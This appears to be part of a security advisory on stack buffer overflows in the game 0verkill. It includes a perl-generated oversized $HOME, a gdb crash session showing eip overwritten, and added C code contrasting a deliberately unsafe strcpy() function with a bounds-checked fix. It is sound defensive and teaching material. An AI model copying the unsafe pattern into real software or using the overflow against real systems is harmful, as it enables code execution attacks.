Compiling 0verkill on a platform other than Windows and setting a long $HOME environment variable demonstrates the buffer overflow, like so:
$ export HOME=`perl -e 'print "A"x300'`
$ gdb ./0verkill
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(gdb) r
Starting program: /root/root/all/gry/0verkill/./0verkill

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r eip
eip            0x41414141      0x41414141
Technically the same type of bug is present in both functions: improper bounds checking when reading the $HOME environment variable. The saved return address is overwritten with the 0x41 ('A') bytes from $HOME, which is why eip reads 0x41414141 at the crash. A third possible vulnerability is in the send_message() function, which is called from play():
Using strcpy() in such an unsafe manner makes it possible to create a buffer overflow condition. With GetLastErrorText() it might also be possible to create a buffer overflow condition, but the author was unable to exploit it.
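The following C is an added illustration, not 0verkill's own source (which this page does not reproduce). It shows the pattern the advisory describes in both the $HOME handling and send_message(): an unchecked strcpy() of attacker-controlled input into a fixed-size stack buffer, beside a bounds-checked replacement that refuses input that does not fit. It also constructs the same 300-byte "A" string that the perl one-liner in the gdb session produces. The function names, the 256-byte buffer size and the "/.0verkill" suffix are assumptions made for the example.

```c
/* Added example, not 0verkill's code. Names, buffer size and suffix are
 * hypothetical; only the vulnerable pattern and its fix are the point. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATH_BUF 256   /* assumed fixed buffer size */

/* Vulnerable pattern (constructed to mirror the advisory): no length check,
 * so a $HOME longer than the buffer runs past it and overwrites the saved
 * return address. With HOME="AAAA...", that is the 0x41414141 seen in eip. */
void build_config_path_unsafe(char *out /* PATH_BUF bytes */, const char *home)
{
    strcpy(out, home);          /* overflows when strlen(home) >= PATH_BUF */
    strcat(out, "/.0verkill");  /* second unchecked write */
}

/* Hardened form: check that the result fits (including the terminating NUL)
 * before writing, then copy with an explicit bound. Returns 0 on success,
 * -1 when the input is missing or would not fit. */
int build_config_path_safe(char *out, size_t out_len, const char *home)
{
    const char *suffix = "/.0verkill";
    if (home == NULL || out == NULL || out_len == 0)
        return -1;
    /* home + suffix must leave one byte for the NUL */
    if (strlen(home) + strlen(suffix) >= out_len)
        return -1;
    /* snprintf never writes more than out_len bytes; the return-value check
     * is belt and braces in case the length arithmetic above is ever changed */
    int n = snprintf(out, out_len, "%s%s", home, suffix);
    if (n < 0 || (size_t)n >= out_len)
        return -1;
    return 0;
}

/* Constructed input: 'count' bytes of 'A', the same value the advisory
 * builds with perl -e 'print "A"x300'. Caller frees the result. */
char *make_long_home(size_t count)
{
    char *s = malloc(count + 1);
    if (s == NULL)
        return NULL;
    memset(s, 'A', count);
    s[count] = '\0';
    return s;
}

int main(void)
{
    char buf[PATH_BUF];
    char *home = make_long_home(300);
    if (home == NULL)
        return 1;

    /* build_config_path_unsafe(buf, home) would smash the stack here,
     * so the unsafe version is shown but deliberately not called. */
    if (build_config_path_safe(buf, sizeof buf, home) != 0)
        printf("rejected: $HOME of %zu bytes does not fit in %d\n",
               strlen(home), PATH_BUF);

    if (build_config_path_safe(buf, sizeof buf, "/root") == 0)
        printf("ok: %s\n", buf);

    free(home);
    return 0;
}
```

The check in build_config_path_safe() is the one the advisory says is missing: the length of the environment-supplied string is compared against the destination before any byte is written, so an oversized $HOME is rejected instead of being copied past the end of the stack frame.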